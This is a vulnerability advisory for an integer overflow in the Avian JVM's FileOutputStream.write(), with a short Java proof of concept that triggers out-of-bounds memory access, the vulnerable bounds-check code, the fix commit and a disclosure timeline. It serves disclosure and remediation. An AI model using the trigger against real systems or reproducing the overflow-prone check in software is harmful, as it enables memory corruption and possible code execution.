ReadyTalk Avian JVM FileOutputStream.write() Integer Overflow

`Vulnerability title: Avian JVM FileOutputStream.write() Integer Overflow  
Author: Pietro Oliva  
Vendor: ReadyTalk  
Product: Avian JVM   
Affected version: 1.2.0 before 27th October 2020  
Fixed Version: 1.2.0 since 27th October 2020  
  
Description:  
The issue is located in the FileOutputStream.write() method defined in  
FileOutputStream.java, where a boundary check is performed in order to prevent  
out-of-bounds memory read/write. However, this check contained an integer   
overflow which leads to the same check being bypassed and out-of-bounds   
read/write.   
  
Impact:  
Attackers could exploit this vulnerability to read/write arbitrary content in  
the JVM memory. This could in turn result in denial of service, memory   
disclosure, or arbitrary code execution in the context of the JVM.  
  
Exploitation:  
The following PoC would trigger an OOB read/write and/or crash of Avian JVM:  
  
import java.io.IOException;  
import java.io.FileDescriptor;  
import java.io.FileOutputStream;  
  
public class poc {  
  
public static void main(String[] args) throws IOException {  
byte[] data = "somedata".getBytes();  
FileDescriptor fd = new FileDescriptor().out;  
FileOutputStream fos = new FileOutputStream(fd);  
  
fos.write(data, 1, 0x7fffffff); // Integer overflow + OOB read/write here  
}  
}  
  
  
Evidence:  
  
public void write(byte[] b, int offset, int length) throws IOException {  
if (b == null) {  
throw new NullPointerException();  
}  
  
if (offset < 0 || offset + length > b.length) { // Integer overflow here  
throw new ArrayIndexOutOfBoundsException();  
}  
  
write(fd, b, offset, length);  
}  
  
extern "C" JNIEXPORT void JNICALL  
Java_java_io_FileOutputStream_write__I_3BII(JNIEnv* e,  
jclass,  
jint fd,  
jbyteArray b,  
jint offset,  
jint length)  
{  
jbyte* data = static_cast<jbyte*>(malloc(length));  
  
if (data == 0) {  
throwNew(e, "java/lang/OutOfMemoryError", 0);  
return;  
}  
  
e->GetByteArrayRegion(b, offset, length, data);  
if (not e->ExceptionCheck()) {  
doWrite(e, fd, data, length);  
}  
  
free(data);  
}  
  
void JNICALL GetByteArrayRegion(Thread* t,  
jbyteArray array,  
jint offset,  
jint length,  
jbyte* dst)  
{  
ENTER(t, Thread::ActiveState);  
  
if (length) {  
// Out-of-bounds read/write here  
memcpy(dst, &(*array)->body()[offset], length * sizeof(jbyte));  
}  
}  
  
As can be observed above, offset+length can overflow in FileOutputStream.write()  
and later result in OOB read/write during memcpy() in GetByteArrayRegion().   
  
Mitigating factors:  
Since offset needs to be a positive integer, and length is limited to a valid  
malloc argument, there is a limited range of memory where an attacker could read  
or write as a result of this vulnerability.  
  
Remediation:  
  
A fix has been made available with the following commit:  
https://github.com/ReadyTalk/avian/commit/0871979b298add320ca63f65060acb7532c8a0dd  
  
Disclosure timeline:  
20th October 2020 - Vulnerability reported.  
20th October 2020 - Vulnerability acknowledged.  
20th October 2020 - CVE request sent to Mitre.  
23rd October 2020 - Sent reminder to Mitre.  
27th October 2020 - Sent reminder to Mitre.  
27th October 2020 - Patch proposed via pull request.  
27th October 2020 - Patch merged into master branch.  
29th October 2020 - Sent reminder to Mitre.  
2nd November 2020 - CVE request sent again to Mitre.  
11th November 2020 - Vulnerability details shared on fulldisclosure without CVE identifier.  
  
  
`